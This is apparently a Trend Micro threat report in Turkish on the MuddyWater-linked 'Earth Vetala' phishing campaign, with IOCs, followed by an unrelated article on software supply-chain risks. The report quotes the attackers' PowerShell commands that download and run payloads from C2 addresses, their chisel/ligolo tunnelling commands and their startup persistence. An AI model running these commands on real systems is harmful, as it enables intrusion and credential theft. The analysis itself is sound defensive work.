MuddyWater Saldırısı MENA’daki Kuruluşları Hedef Almaya Devam Ediyor

Trend Micro araştırmacıları kısa bir süre önce MuddyWater kaynaklı olduğundan şüphelenilen bir etkinlik tespit etti. Bu girişim, Orta Doğu’daki ve komşu bölgelerdeki çeşitli kuruluşları hedef alıyor.

Trend Micro araştırmacıları kısa bir süre önce Orta Doğu’daki ve komşu bölgelerdeki çeşitli kuruluşları hedef alan bir etkinlik tespit etti. Anomali şirketinin gerçekleştirdiği ve benzer kurbanları hedef alan farklı bir girişimi de ortaya çıkaran bir araştırma sonucunda bu etkinlikten haberdar olduk. Kesin olmamakla beraber, tespit edilen bu yeni etkinliğin MuddyWater (TEMP.Zagros, Static Kitten, Seedworm olarak da bilinmektedir) saldırısı ile bağlantılı olduğunu düşünüyoruz.

Ayrıca, Anomali şirketinin tespit ettiği etkinlik ve 2021 yılında da devam eden girişim arasında bir ilişki bulduk. Bu girişim aşağıdaki yasal uzaktan yönetim araçlarını kullanmaktadır:

Yetkisiz erişim elde etmeyi amaçlayan bu saldırılara Earth Vetala adını verdik. Earth Vetala saldırısında, kötü amaçlı paketleri göndermek için yasal dosya paylaşım hizmetlerine gömülü bağlantılar içeren hedefli kimlik avı e-postaları kullanıldı. Bu linkler e-postaların yanı sıra tuzak niteliğindeki belgelere de gömülmüştü.

Bir kurbana erişim sağlandığında, saldırganlar erişilen kullanıcı hesabının bir yöneticiye mi yoksa normal bir kullanıcıya mı ait olduğu belirleyebiliyordu. Sonrasında ise parola/işlem dökümü yardımcı araçlarının, ters tünel oluşturma araçlarının ve özel arka kapıların dahil olduğu saldırı sonrası araçları indiriyorlardı. Bu aşamalardan sonra tehdit aktörleri, karmaşık PowerShell komut dosyalarını yürütmek için ek komut ve kontrol (C&C) altyapılarını kullanarak iletişimi başlatıyordu.

Genel Bakış

Yapılan analizler, Earth Vetala girişiminin devam etmekte olduğunu ve bu tehdit faktörünün İran’ın hedeflerine uygun görünen çıkarlar içerdiğini gösteriyor.

Earth Vetala saldırısı başladığı günden beri Orta Doğu’daki ülkeleri hedef almaktadır. Bu girişimde Earth Vetala saldırısının tehdit aktörleri, hedefli kimlik avı e-postalarını ve tuzak niteliğindeki belgeleri kullanarak Birleşik Arap Emirlikleri, Suudi Arabistan, İsrail ve Azerbaycan’daki kuruluşları hedef almıştır. Bu kimlik avı e-postaları ve tuzak niteliğindeki belgeler, ScreenConnect uzak yönetici aracını içeren arşivleri dağıtmak için yasal dosya paylaşım hizmetlerine bağlanan gömülü URL’ler içerir. ScreenConnect, sistem yöneticilerine kurumsal sistemlerini uzaktan yönetme olanağı tanıyan yasal bir uygulamadır.

Yaptığımız araştırmada Anomali şirketinin tespit ettiği aynı girişimle bağlantılı tehdit aktörleri bulduk. Analizler, Earth Vetala saldırısının bu yazının yayınlandığı tarih itibariyle hala devam etmekte olduğunu gösteriyor. Bu girişimde tehdit aktörleri, parolaları ele geçirmek ve açık kaynaklı araçları kullanarak C&C iletişimlerine tünel oluşturmak için saldırı sonrası araçlarını; hedeflenen ana bilgisayarlar ve ortamlarda kalıcı bir varlık oluşturmak için ise ek C&C altyapısını kullanmaktadır.

Teknik Analiz

Araştırmamız sırasında, bir devlet kurumundan gönderildiği iddia edilen hedefli bir kimlik avı e-postası tespit ettik.

Şekil 1. Gömülü URL içeren kimlik avı e-postası

Bu e-posta, alıcıları URL’ye tıklamaları ve kötü amaçlı bir dosyayı indirmeleri için ikna etmeye çalışır. Biri .PDF dosyası ve diğeri .RTF dosyası olmak üzere iki dosyadan birinin indirilebileceğini gördük.

Tıpkı hedefli kimlik avı e-postasında olduğu gibi, tuzak niteliğindeki belgelerin içeriği de kurbanı başka bir kötü amaçlı URL’ye tıklaması ve bir .ZIP dosyasını indirmesi için ikna etmeye çalışır.

Bu .ZIP dosyası, RemoteUtilities tarafından geliştirilen yasal bir uzaktan yönetim yazılımının kopyasını içerir ve aşağıdakilerin de dahil olduğu uzaktan yönetim yeteneklerini sağlar:

  • Dosyaları indirme ve yükleme
  • Ekran görüntüleri alma
  • Dosyalara ve dizinlere göz atma
  • İşlemleri yürütme ve sonlandırma

Araştırmamızda, RemoteUtilities uzaktan yönetim yazılımını yukarıdaki yöntemle dağıtmak için kullanılan birden fazla .ZIP dosyasıyla karşılaştık. Bu dosyaların tümü aynı RemoteUtilities örneğini dağıtıyordu. Bu aracın kullanılması, ScreenConnect’in kullanıldığı daha önceki saldırılar gibi bu girişimi de diğer araştırmalardan ayırır. Aksi takdirde kullanımda olan TTP verileri genel olarak benzer kalacaktır.

RemoteUtilities Analizi

RemoteUtilities yazılımı yürütüldüğünde aşağıdaki komutla msiexec.exe uygulaması başlatılır:

pastedGraphic.png

Şekil 4. RemoteUtilities Kurulumu

MSI yükleyicisi, hedef makineye Uzak Yardımcı Programlar – Ana Bilgisayar adlı bir hizmet yükler:

pastedGraphic_1.png

Şekil 5. Uzak Yardımcı Programlar Hizmeti

Sonrasında, yüklenen hizmet RemoteUtilities’e ait olan id.remoteutilities.com etki alanıyla iletişim kurar. Bu bağlantı, etki alanındaki İnternet Kimliği Bağlantısı adı verilen bir özellikle ilgilidir. Bu özellik, bir ara İnternet sunucusunun tıpkı proxy sunucuları gibi bağlantıya aracılık etmesine olanak tanır. Böylece tehdit aktörü, sonrasında asıl RemoteUtilities ana bilgisayarına bağlanacak olan Internet-ID sunucusu ile bağlantı kurar.

pastedGraphic_2.png

Şekil 6. kod sunucusu bağlantısı

Saldırı Sonrası Analizi

Araştırmamızda, Suudi Arabistan’da bulunan ve ScreenConnect uzaktan yönetim yazılımını kullanan güvenliği ihlal edilmiş bir ana bilgisayar tespit ettik. Kurbanlar yürütülebilir bir ScreenConnect dosyası (SHA256 karması: 2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcf) içeren kötü amaçlı bir .ZIP dosyası (SHA256 karması: b2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcf) ile hedeflenmişti

Yukarıda da belirttiğimiz gibi, bu ScreenConnect yürütülebilir dosyası, instance-sy9at2-relay.screenconnect.com adresinde bulunan ve 51.68.244.39’a çözümlenen internet kimliği sunucusuna bağlanır.

Söz konusu etki alanına bir önceki araştırmamızda da değinmiştik. Daha sonrasında ise bu tehdit aktörlerinin ScreenConnect yazılımını kullanarak güvenliği ihlal edilmiş ana bilgisayarla aşağıdaki komutları çalıştırarak etkileşimde kurduğunu gözlemledik.

cmd.exe net kullanıcı/etki alanı

Yukarıdaki komut, saldırganın etki alanı denetleyicisindeki tüm kullanıcılara erişmesini sağlar.

Yürütülen bir sonraki komut ise şudur:

powershell.exe -exec bypass -w 1 -file a.ps1

Bu, bazı türdeki PowerShell komut dosyalarını yürütmek için kullanılan bir komuttur. Fakat bu a.ps1 dosyasına erişimimiz yoktu. Bu yüzden burada hangi işlevin sağlandığı konusunda net bir bilgimiz yok.

Gönderilen bir diğer komut da şudur:

powershell.exe iwr -uri http://87.236.212[.]184/SharpChisel.exe -outfile c:\programdata\SharpChisel.exe -usebasicparsing

Bu komut 187.236.212[.]184’e bağlanır ve SharpChisel.exe (SHA256: 61f83466b512eb12fc82441259a5205f076254546a7726a2e3e983011898e4e2) adlı bir dosyayı indirerek bunu C:\programdata dizinine kaydeder. SharpChisel ismi, bu dosyanın amacıyla ilişkili olabilir. Dosyanın hedefi, “chisel” olarak adlandırılan bir tünel oluşturma aracına yönelik C# sarmalayıcısıdır. Yukarıdaki IP adresi, İran’daki bir sunucuya konumlandırılmıştır.

Bir sonraki aşamada aşağıdaki komut SharpChisel’i yapılandırır:

C:\programdata\SharpChisel.exe client 87.236.212[.]184:8080 r:8888:127.0.0.1:9999

Bu işlem, tüm trafiği 9999 bağlantı noktasındaki yerel ana bilgisayarla aynı uzak sunucuya yönlendirir.

Ardından farklı ayarlara sahip başka bir SharpChisel örneği, bu defa aşağıdaki komut satırını kullanarak PowerShell ile yürütülür:

powershell.exe C:\programdata\SharpChisel.exe client 87.236.212[.]184:443 R:8888:127.0.0.1:9999

Bu sefer trafik, sunucuya 443 numaralı bağlantı noktası üzerinden iletilecektir.

23.95.215.100:8080 konumunda farklı bir C&C sunucusuna bağlanan üçüncü bir SharpChisel örneği aşağıdaki komutla başlatılır:

C:\programdata\SharpChisel.exe client 23.95.215[.]100:8080 r:8888:127.0.0.1:9999

Sonrasında bu komut aşağıdaki PowerShell komut satırı ile yapılandırılır:

powershell.exe C:\programdata\SharpChisel.exe client 23.95.215[.]100:8080 R:8888:127.0.0.1:9999

Söz konusu tehdit aktörünün SharpChisel’i düzgün çalışacak şekilde yapılandıramadığını düşünüyoruz. Aşağıdaki komutun kullanılması, bize bu varsayımımızı destekleyecek ek bir gerekçe sunuyor:

powershell.exe iwr -uri hxxp://87.236.212[.]184/procdump64.exe -outfile c:\programdata\procdump64.exe -usebasicparsing

Bu komut C&C sunucusuna bağlanır, procdump64.exe dosyasını indirir ve bunu C:\programdata dizinine kaydeder. Bu da SharpChisel’in düzgün bir şekilde yapılandırılamadığına ilişkin varsayımımızı desteklemektedir. Saldırgan procdump64.exe yardımcı programını indirmek ve çalıştırmak için bu dosya yerine PowerShell’i kullanır.

pastedGraphic_3.png

Şekil 7. LIGOLO yürütme örneği

Bu işlem iki farklı komut kullanılarak yapılır:

C:\programdate\1.exe -relayserver 87.236.212[.]184:5555

C:\users\public\new.exe -relayserver 87.236.212[.]184:5555

Bu işlemin sonrasında tehdit aktörünün aşağıdaki komutu kullanarak SharpChisel’i birkaç kez tekrar kullanmaya çalıştığını görüyoruz:

C:\programdata\SharpChisel.exe client 87.236.212[.]184:8080 r:8888:127.0.0.1:9999
powershell.exe C:\programdata\SharpChisel.exe client 87.236.212[.]184:8080 R:8888:127.0.0.1:9999

İki farklı araç kullanılarak denenmesine rağmen C&C sunucusuna yönelik bir tünel bağlantısının kurulamadığı sonucuna vardık.

C&C sunucularına yönelik tünel bağlantısını yapılandırma girişimin başarısız olmasının ardından, tehdit aktörleri bir uzaktan erişim aracı (RAT) indirerek bunu yapılandırmayı denedi. Bunun için aşağıdaki PowerShell komutu kullanıldı:

powershell.exe iwr -uri hxxp://87.236.212[.]184/out1 -outfile c:\users\public\out1.exe -usebasicparsing

Bu komut, out1.exe dosyasını indirir ve C:\users\public\ dizinine kaydeder. Bir UPX paket açıcı kullanarak yürütülebilir bir Python dosyasını içeren dosya içeriğini ayıklamayı başardık. Ardından, Python bytecode dosyalarının tümünü almak için pyinstxtractor.py kullanarak yürütülebilir python dosyasının derlemesini açtık. Bunlar sonraki aşamada orijinal phyton kodunu elde etmek için easypythondecompiler kullanılarak kaynak koda dönüştürülür.

out1.exe RAT aşağıdaki yeteneklere sahiptir:

  • Veri kodlaması
  • E-posta ayrıştırma
  • Dosya ve kayıt defteri kopyalama
  • HTTP/S bağlantısı desteği
  • Yerel komut satırı
  • İşlem yapma ve dosya yürütme

Bu aşamanın ardından C:\users\public\Browser64.exe dosyası çalıştırılır. Browser64, aşağıdaki uygulamalardan kimlik bilgilerini alan bir araçtır:

  • Chrome
  • Chromium
  • Firefox
  • Opera
  • Internet Explorer
  • Outlook
pastedGraphic_4.png

Şekil 8. Browser64.exe Kullanım Örneği

Browser64.exe kullanıldıktan sonra aşağıdaki komutun çalıştırıldığını gözlemledik:

powershell.exe iex(new-object System.Net.WebClient).DownloadString(‘hxxp://23.94.50[.]197:444/index.jsp/deb2b1a127c472229babbb8dc2dca1c2/QPKb49mivezAdai1’)

Bu aşamada saldırganlar SharpChisel’i tekrar kullanmayı denedi ve başarısız oldu:

powershell.exe C:\programdata\SharpChisel.exe client 23.95.215[.]100:443 R:8888:127.0.0.1:9999

C:\programdata\SharpChisel.exe client 23.95.215[.]100:443 R:8888:127.0.0.1:9999

C:\programdata\SharpChisel.exe server -p 9999 –socks5

Son olarak, aşağıdaki komutlar kullanılarak bir kalıcılık mekanizmasının oluşturulduğunu gözlemledik:

cmd.exe /c Wscript.exe “C:\Users\[REDACTED]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\news.js”

cmd.exe /c “C:\Users\[REDACTED]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\newsblog.js”

newsblog.js‘nin bir kopyasını elde etmeyi başardık. Bu dosya, aşağıdaki URL ile iletişim kuran basit bir VBS indirme programıdır:

hxxp://23[.]95[.]215[.]100:8008/index.jsp/7e95a3d753cc4a17793ef9513e030b49/4t2Fg7k6wWRnKgd9

pastedGraphic_5.png

Şekil 9. newsblog.js

Bu komut dosyası yeni bir HTTP nesnesi oluşturur ve sonrasında sistemin yerel proxy ayarlarını devre dışı bırakmaya çalışır. Bu işlemin ardından komut dosyası C&C URL’sinde bir HTTP GET isteği uygular, sunucunun yanıtını alır ve 10 saniye boyunca uyku moduna geçer.

Analizimiz esnasında bu sunucu hala kullanılabiliyordu. Sunucudan gelen yanıt, bellekte çalıştırılan kodlanmış bir PowerShell komut dosyasını içerir. Bu komut dosyasının kaynak koda dönüştürülmesi sonucunda bir arka kapı içerdiği ortaya çıkmıştır:

pastedGraphic_6.png

Şekil 10. gizliliği kaldırılmış PowerShell arka kapısı

Yukarıdaki ekran görüntüsü, bellek içerisindeki PowerShell arka kapısının kısaltılmış bir görüntüsünü göstermektedir. PowerShell arka kapısı aşağıdaki yeteneklere sahiptir.

  • Skype bağlantısını kontrol etme
  • Skype’ı indirme ve yükleme
  • C2 bağdaştırıcısı ile kodlanmış iletişim
  • C2 sunucusundan gönderilen komutları yürütme
  • Çok faktörlü kimlik doğrulama ayarlarını alma
  • Mevcut oturum açmış kullanıcı ve işletim sistemi sürümü bilgilerini alma

Earth Vetala Saldırısının Ayak İzi

Earth Vetala saldırısı, birden çok ülkeyi hedef alan kapsamlı bir girişim gerçekleştirmiştir. Bu saldırının aşağıdaki ülkelerde gerçekleştirildiğini gözlemledik:

  • Azerbaycan
  • Bahreyn
  • İsrail
  • Suudi Arabistan
  • Birleşik Arap Emirlikleri
pastedGraphic_7.png

Şekil 11. Etkilenen ülkeler

Earth Vetala saldırısının aşağıdaki sektörleri hedeflediğini gözlemledik:

  • Devlet Kurumları
  • Akademi
  • Turizm

Trend Micro Çözümleri

Earth Vetala saldırısı ilginç bir tehdit niteliğindedir. Bu saldırı uzaktan erişim yeteneklerine sahip olsa da saldırganların bu araçların tamamını kullanabilecek uzmanlıkta olmadığı görülmektedir. Saldırının MuddyWater tehdit aktörleriyle bağlantılı olduğunu düşünüyoruz. Saldırganların diğer bağlantılı girişimlerde gösterdiği yüksek teknik beceriler göz önünde bulundurulduğunda, bu oldukça beklenmedik bir durum.

Bu alanda elde ettiğimiz bulgulara Özel İstihbarat Araştırma (DIR) analistlerimiz sayesinde ulaştık. Analistlerimiz, kuruluşların önemli kararlar almasına ve karşılaştıkları güvenlik sorunlarının temeli anlamasına yardımcı olmak için her zaman yardıma hazırdır. Özel İstihbarat Araştırma hizmetimiz hakkında daha fazla bilgi edinmek için lütfen bölgenizdeki Satış ekibimiz ile iletişime geçin.

MITRE ATT&CK Teknik Eşlemesi

TaktikTeknik
Kaynak GeliştirmeAltyapı Edinme: Web Hizmetleri – T1583.006
İlk ErişimKimlik Avı: Hedefli Kimlik Avı Eki – T1566.001 Kimlik Avı: Hedefli Kimlik Avı Bağlantısı – T1566.002
YürütmeKomut ve Komut Dosyası Yorumlayıcı: PowerShell – T1059.001 Komut ve Komut Dosyası Yorumlayıcı: Windows Command Shell – T1059.003 Komut ve Komut Dosyası Yorumlayıcı: Visual Basic – T1059.005 Kullanıcı Yürütmesi: Kötü Amaçlı Bağlantı – T1204.001 Kullanıcı Yürütmesi: Kötü Amaçlı Dosya – T1204.002
Kalıcı, Ayrıcalık YükseltmeÖnyüklemeyi veya Oturum Açmayı Otomatik Başlatma İşlemini Yürütme: Kayıt Defteri Çalıştırma Anahtarları / Başlangıç Klasörü – T1547.001
KeşifHesap Keşfi: Etki Alanı Hesabı – T1087.002
Kimlik Bilgilerine ErişimParola Depolarından Gelen Kimlik Bilgileri: Web Tarayıcılarından Gelen Kimlik Bilgileri – T1555.003
Komut ve DenetimVeri Kodlama: Standart Kodlama – T1132.001
Savunma Sistemlerini AtlatmaDosyaların veya Bilgilerin Gizliliğini Kaldırma/Kodunu Çözme – T1140

Gizliliğin Tehlikeye Girmesine İlişkin Göstergeler

Dosyalar

Dosya adıSHA-256Trend Micro Algılama AdıAçıklama
SharpChisel.exe61f83466b512eb12fc82441259a5205f076254546,a7726a2e3e983011898e4e2HackTool.MSIL.Chisel.ASharpChisel tünel oluşturma aracı
PD64.dllccdddd1ebf3c5de2e68b4dcb8fbc7d4ed32e8f39f6fdf71ac022a7b4d0aa4131Trojan.Win64.PASSDUMP.AHackTool.Win64.PassDump.AC tarafından kullanılan dosya
PasswordDumper.exe0cd6f593cc58ba3ac40f9803d97a6162a308ec3caa53e1ea1ce7f977f2e667d3HackTool.Win64.PassDump.ACParola dökümü aracı
out1.exe79fd822627b72bd2fbe9eae43cf98c99c2ecaa5649b7a3a4cfdc3ef8f977f2e6HackTool.Win64.Lazagne.AGPyinstaller uzak erişim aracı
newsblog.js304ea86131c4d105d35ebbf2784d44ea24f0328fb483db29b7ad5ffe514454f8Trojan.JS.DLOADR.AUSUOLVBS indirme programı
new.exefb414beebfb9ecbc6cb9b35c1d2adc48102529d358c7a8997e903923f7eda1a2HackTool.Win64.LIGOLO.ALIGOLO tünel oluşturma aracı
Browser64.exe3495b0a6508f1af0f95906efeba36148296dccd2ab8ffb4e569254b683584feaHackTool.Win64.BrowserDumper.ATarayıcı veritabanlarına erişim aracı
1.exe78b1ab1b8196dc236fa6ad4014dd6add142b3cab583e116da7e8886bc47a7347HackTool.Win64.LIGOLO.ALIGOLO tünel oluşturma aracı
مکتبة إلکترونیة.pdf70cab18770795ea23e15851fa49be03314dc081fc44cdf76e8f0c9b889515c1bTrojan.PDF.RemoteUtilities.AGömülü URL’ler içeren PDF dosyası

468e331fd3f9c41399e3e90f6fe033379ab69ced5e11b35665790d4a4b7cf254Trojan.W97M.RemoteUtilities.AGömülü URL’ler içeren RTF dosyası
مکتبة إلکترونیة .zipf865531608a4150ea5d77ef3dd148209881fc8d831b2cfb8ca95ceb5868e1393PUA.Win32.RemoteUtilities.ARemoteUtilities içeren arşiv
مکتبة إلکترونیة.exef664670044dbd967ff9a5d8d8f345be294053e0bae80886cc275f105d8e7a376PUA.Win32.RemoteUtilities.ARemoteUtilities uzak erişim yazılımı
برنامج.zip8bee2012e1f79d882ae635a82b65f88eaf053498a6b268c594b0d7d601b1212fPUA.Win32.RemoteUtilities.ARemoteUtilities içeren arşiv
برنامجدولیة.zip9b345d2d9f52cda989a0780acadf45350b423957fb7b7668b9193afca3e0cd27PUA.Win32.RemoteUtilities.ARemoteUtilities içeren arşiv
ورش مجانية.zip5e2642f33115c3505bb1d83b137e7f2b18e141930975636e6230cdd4292990ddPUA.Win32.RemoteUtilities.ARemoteUtilities içeren arşiv
مکتالمنحالدراسیة.zipb2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcfPUA.Win32.ScreenConnect.PScreenConnect içeren arşiv
المنح الدرایةس.exe3e4e179a7a6718eedf36608bd7130b62a5a464ac301a211c3c8e37c7e4b0b32bPUA.Win32.ScreenConnect.PScreenConnect uzak erişim yazılımı
Dosya adıSHA-256Trend Micro Algılama AdıAçıklama
SharpChisel.exe61f83466b512eb12fc82441259a5205f076254546a7726a2e3e983011898e4e2HackTool.MSIL.Chisel.ASharpChisel tünel oluşturma aracı
PD64.dllccdddd1ebf3c5de2e68b4dcb8fbc7d4ed32e8f39f6fdf71ac022a7b4d0aa4131Trojan.Win64.PASSDUMP.AHackTool.Win64.PassDump.AC tarafından kullanılan dosya
PasswordDumper.exe0cd6f593cc58ba3ac40f9803d97a6162a308ec3caa53e1ea1ce7f977f2e667d3HackTool.Win64.PassDump.ACParola dökümü aracı
out1.exe79fd822627b72bd2fbe9eae43cf98c99c2ecaa5649b7a3a4cfdc3ef8f977f2e6HackTool.Win64.Lazagne.AGPyinstaller uzak erişim aracı
newsblog.js304ea86131c4d105d35ebbf2784d44ea24f0328fb483db29b7ad5ffe514454f8Trojan.JS.DLOADR.AUSUOLVBS indirme programı
new.exefb414beebfb9ecbc6cb9b35c1d2adc48102529d358c7a8997e903923f7eda1a2HackTool.Win64.LIGOLO.ALIGOLO tünel oluşturma aracı
Browser64.exe3495b0a6508f1af0f95906efeba36148296dccd2ab8ffb4e569254b683584feaHackTool.Win64.BrowserDumper.ATarayıcı veritabanlarına erişim aracı
1.exe78b1ab1b8196dc236fa6ad4014dd6add142b3cab583e116da7e8886bc47a7347HackTool.Win64.LIGOLO.ALIGOLO tünel oluşturma aracı
مکتبة إلکترونیة.pdf70cab18770795ea23e15851fa49be03314dc081fc44cdf76e8f0c9b889515c1bTrojan.PDF.RemoteUtilities.AGömülü URL’ler içeren PDF dosyası

468e331fd3f9c41399e3e90f6fe033379ab69ced5e11b35665790d4a4b7cf254Trojan.W97M.RemoteUtilities.AGömülü URL’ler içeren RTF dosyası
مکتبة إلکترونیة .zipf865531608a4150ea5d77ef3dd148209881fc8d831b2cfb8ca95ceb5868e1393PUA.Win32.RemoteUtilities.ARemoteUtilities içeren arşiv
مکتبة إلکترونیة.exef664670044dbd967ff9a5d8d8f345be294053e0bae80886cc275f105d8e7a376PUA.Win32.RemoteUtilities.ARemoteUtilities uzak erişim yazılımı
برنامج.zip8bee2012e1f79d882ae635a82b65f88eaf053498a6b268c594b0d7d601b1212fPUA.Win32.RemoteUtilities.ARemoteUtilities içeren arşiv
برنامجدولیة.zip9b345d2d9f52cda989a0780acadf45350b423957fb7b7668b9193afca3e0cd27PUA.Win32.RemoteUtilities.ARemoteUtilities içeren arşiv
ورش مجانية.zip5e2642f33115c3505bb1d83b137e7f2b18e141930975636e6230cdd4292990ddPUA.Win32.RemoteUtilities.ARemoteUtilities içeren arşiv
مکتالمنحالدراسیة.zipb2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcfPUA.Win32.ScreenConnect.PScreenConnect içeren arşiv
المنح الدرایةس.exe3e4e179a7a6718eedf36608bd7130b62a5a464ac301a211c3c8e37c7e4b0b32bPUA.Win32.ScreenConnect.PScreenConnect uzak erişim yazılımı

  • 23.94.50.197:444
  • 23.95.215.100:443
  • 23.95.215.100:8080
  • 87.236.212.184:443
  • 87.236.212.184:8008

Yazan: Adi Peretz, Erick Thek

5 Mart 2021

Tedarik Zincirinin Zayıf Yanlarını Belirleme

Tedarik zincirindeki zayıf noktalara sürekli olarak kötü amaçlı saldırılar gerçekleştirilmektedir. Tüm saldırılar gibi, bu saldırılar da daha gelişmiş şekillere bürünebilir. Risklerle karşılaşılabilecek birden çok aşaması bulunan yazılım geliştirme çalışmaları ise nispeten daha savunmasızdır.

Meşhur Orion Solar Winds vakası, hem siber güvenlik topluluğunda hem de kamuda büyük yankı uyandırırken tüm dünyanın dikkatini tedarik zinciri saldırılarına çekti. Söz konusu saldırılar yeni değil, hatta bu tür tehditler epeydir oldukça yaygın. Bu saldırılar da tüm saldırılarda olduğu gibi gelişmiş formlar alıyor. Bu makalede bu tür saldırıların örneklerini inceleyecek ve olası yeni senaryolara bakacağız.

Zayıf Halkalar Nerede?

Öncelikle tedarik zincirine somut bir tanım getirelim. Genel tanım, “bir ürünü müşteriye sunma süreci” şeklinde. Bilgisayar dünyasında ise bu tanımdaki ürünün karşılığı, geliştirilen yazılım oluyor. Bu nedenle, öncelikle yazılım geliştirme sürecinin kendisini mercek altına alalım.

Yazılım geliştiriciler, hangi yöntemi kullanırlarsa kullansınlar karmaşık projeleri daha basit görevlere bölmek zorundadırlar. Böylece görevler tanımlandıktan sonra istenilen sorun izleme yazılımında belirli geliştiricilere atanabilir. Ardından yazılım geliştirici bir kod yazar ve bu kodu test edip değişiklikleri kaynak kod yönetimi (SCM) yazılımına aktarır.

Kod, sürekli entegrasyon ve sürekli teslimat (CI/CD) hattında işlenir. Bu hat; derlemeler, testler ya da proje tercihinin son devreye alımını gerçekleştirmek üzere belirli görevleri yürütür. 

Tanımlanan tedarik zinciri sürecimizin her adımında kendine özgü güvenlik riskleri ve etkileri bulunur. Örneğin, bazı güvenlik ihlalleri sorun izleme yazılımını kullanan kötü amaçlı kullanıcılardan kaynaklanabilir. Bu kullanıcılar, güvenlik bilgilerinden fayda sağlayan şirket içerisindeki öfkeli kişiler veya güvenlik açıklarından istifade eden herhangi biri olabilir. Bu senaryolar gerçekleşebilir, ancak zincirde başka birçok adım olduğu için etkisi muhtemelen küçük olacaktır. Tedarik zincirinin diğer bölümlerinin kötü amaçlı görevlerden etkilenme olasılığı oldukça yüksektir. Bu nedenle, bu senaryo üzerinde çok fazla durmayacağız. Ancak kimlik doğrulaması için bir istisna yapalım. 

Bütün tedarik zincirinin gücü ve dayanıklılığı en zayıf halkalarına bağlı olduğundan, güvenlikle ilgili en iyi uygulamaların göz ardı edilmesi (parolaların tekrar kullanılması veya düzgün kimlik doğrulama mekanizmalarının eksikliği gibi) kötü amaçlı oyuncuların sistemlere erişebileceği ve saldırının etkisinin daha büyük olabileceği anlamına gelir.

Yazılım Geliştiriciler ve SCM

Zincirin diğer bir ayrılmaz parçası, kod yazması için kendisine ihtiyaç duyulan geliştiricidir. Zayıflık ve olası bir güvenlik riski olarak insan faktörünü göz önünde bulundurmak gerekir. Geliştiricinin yerine makineleri koyalım, demiyoruz, ancak geliştiricileri karşılaşabilecekleri riskler konusunda eğitmeliyiz.

Son zamanlarda, tehdit oyuncularının güvenlik açıklarını araştıran kişileri hedef aldıklarını gözlemliyoruz. Teknik bakış açışıyla, bu tehdidin bir Visual Studio proje dosyasında ve spesifik olarak ön derleme olayında gizlenmiş olup PowerShell destekli bir yükte ortaya çıkması ilginçtir. Bu senaryodan öğrenilecek dikkate değer iki bağlantı vardır. Birincisi “meslektaşlar” arasındaki güven düzeyi, ikincisi ise daha kaynak kodunun daha fazla benimsenmesi ve üçüncü taraf proje entegrasyonlarıdır. Hangi kaynak kodunun ve hangi projelerin entegre edileceğine dikkat edilmelidir. Bunun için kullanılan kodun, yazılımın, eklentilerin veya konteynerlerin kaynağının doğrulanması gerekir. Daha önceki çevrimiçi kod yazma platformlarına ilişkin makalelerimizden birinde sorunları ele almıştık.

Geliştiricinin zincirin sonraki bölümü olan SCM’ye de erişimi vardır. Bunun için giriş bilgileri gereklidir ve her erişimde bu bilgilerin tekrar tekrar girilmesi can sıkıcı olduğundan bu bilgiler depolanırlar. Bilgilerin depolanması, sızma riskini de beraberinde getirir ve şifrelenmemiş şekilde depolandıklarında saldırının etkisi daha büyük olur. 

DevOps topluluğunda yaygın bir davranış biçimi görüyoruz: Geliştiriciler, hizmet simgeleri, kullanıcı adları ve e-posta adresleri gibi bilgileri şifrelenmemiş şekilde depoluyor (örneğin, metin tabanlı yapılandırma dosyaları veya çevresel değişkenler).

Şekil 2. Giriş bilgilerinin ve simgelerin “güvenli” ortamlarda düzyazı (plaintext) içinde depolanmasına bir örnek

Bu güvenlik meselelerini konuşmak lüzumsuz gibi görünse de bir zincirin en zayıf halkası kadar güçlü olduğu klişesinde doğruluk payı vardır. Bu nedenle de riskleri azaltan önlemler (örneğin parola kasaları kullanmak), üzerinde düşünülmeye değer konulardır.

Şekil 3. Kaynak kodda sabit kodlu düzyazı giriş bilgilerinin kullanılmasına bir örnek

Özünde, geliştiriciler sabit kodlu giriş bilgilerini SCM’yeaktarmamalıdır. Örneğin, kod olarak altyapı (IaC)kullanırken, giriş bilgilerini depolamayı genel olarak göz önünde bulundurmalıdırlar.

CI/CD Hattı

Zincirin sonraki parçası CI/CD hattıdır. Jenkins, GitLab, TeamCity, Azure DevOps gibi tanıdık isimlerin yer aldığı yazılım tedarikçileri arasında yoğun bir rekabet vardır. 

CI/CD yazılımının içindeki hat aşağıdakilere bölünebilir:

Şekil 4. CI/CD Hattı

Sistem Erişimi

Güvenlik açısından bakıldığında, bu tür sistemlere erişimin sınırlanması ve herkese erişim izni verilmemesi gerekir. Bu sistemler kurumsal ağda gizlenmeli, yalnızca belirli rollerdeki ve belirli erişim haklarına sahip kullanıcılar tarafından erişilebilir olmalıdır. Güvenlik açıkları söz konusu olabileceği için basit bir şekilde internete erişmek bile bir güvenlik riskidir ve bu durum, daha önce de şahit olduğumuz gibi tehdit oyuncuları tarafından aktif olarak istismar edilebilir. 

Sistem Yapılandırılması

Yanlış yapılandırma da güvenlik riskine ve ilgili sorunlara neden olabilir. Belirli ortamlar için belirli yapılandırmalar gerekir. Örneğin, bir kuruluşta birden çok kullanıcının sisteme erişmesi gerekir, ancak herkesin rolü farklıdır. Bu durumda role dayalı güvenlik yapılandırması gereklidir. Bununla birlikte, daha önce Jenkins vakasında da açıkladığımız gibi, bu yapılandırmalarda bazı tuzaklar bulunur. Yazılımın ve yapılandırma seçeneklerinin giderek karmaşık bir hal almasıyla birlikte, yazılımın yanlış yapılandırmalara karşı test edilmesi ısrarla tavsiye edilir.

Kaynak Kodun Alınması

Burada iki modelden söz edebiliriz:

Azure DevOps sunucusunda olduğu gibi SCM CI/CD hattına entegre edilir

SCM farklı ortamlarda çalışır; bu nedenle erişim belirteçlerinin veya giriş bilgilerinin sistemin içinde depolanması gerekir

Kaynak kodu bilgilerinin açığa çıkması kötü amaçlı kaynak kodu modifikasyonlarına neden olabileceği için yazılımın kaynak kodu giriş bilgilerini nasıl depoladığı çok önemlidir. Bununla birlikte, CI/CD yazılımında güvenli olmayan uygulamalardan faydalanıldığını da gördüğümüzü ve üçüncü taraf uzantılarında şifrelenmemiş giriş bilgisi depolama zafiyetlerini keşfettiğimizi (Jenkins eklentileri vakasında olduğu gibi) söylememiz gerekir.

